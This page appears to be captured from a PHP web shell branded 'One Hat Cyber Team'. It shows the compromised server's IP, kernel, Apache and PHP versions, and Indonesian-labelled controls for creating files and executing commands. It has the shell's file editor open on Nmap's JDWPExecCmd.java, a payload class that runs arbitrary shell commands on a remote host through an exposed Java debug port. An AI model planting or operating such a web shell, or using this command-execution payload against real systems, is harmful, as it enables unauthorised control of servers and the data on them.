One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
nmap
/
nselib
/
data
/
jdwp-class
/
Edit File:
JDWPExecCmd.java
import java.io.*; /* This is the JDWPExecCmd source used for jdwp-exec script to execute * a command on the remote system. * * It just executes the shell command passed as string argument to * run() function and returns its output. * * Compile simply with: * javac JDWPExecCmd.java (should be in the nselib/data/ directory). * * author = "Aleksandar Nikolic" * license = "Same as Nmap--See https://nmap.org/book/man-legal.html" */ public class JDWPExecCmd { public static String run(String cmd) { String result = cmd + " output:\n"; try{ Process p = Runtime.getRuntime().exec(cmd); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line = null; while ((line = in.readLine()) != null) { result += line.trim()+"\n"; } result += "\n"; }catch(Exception ex){ } return result; } }
Simpan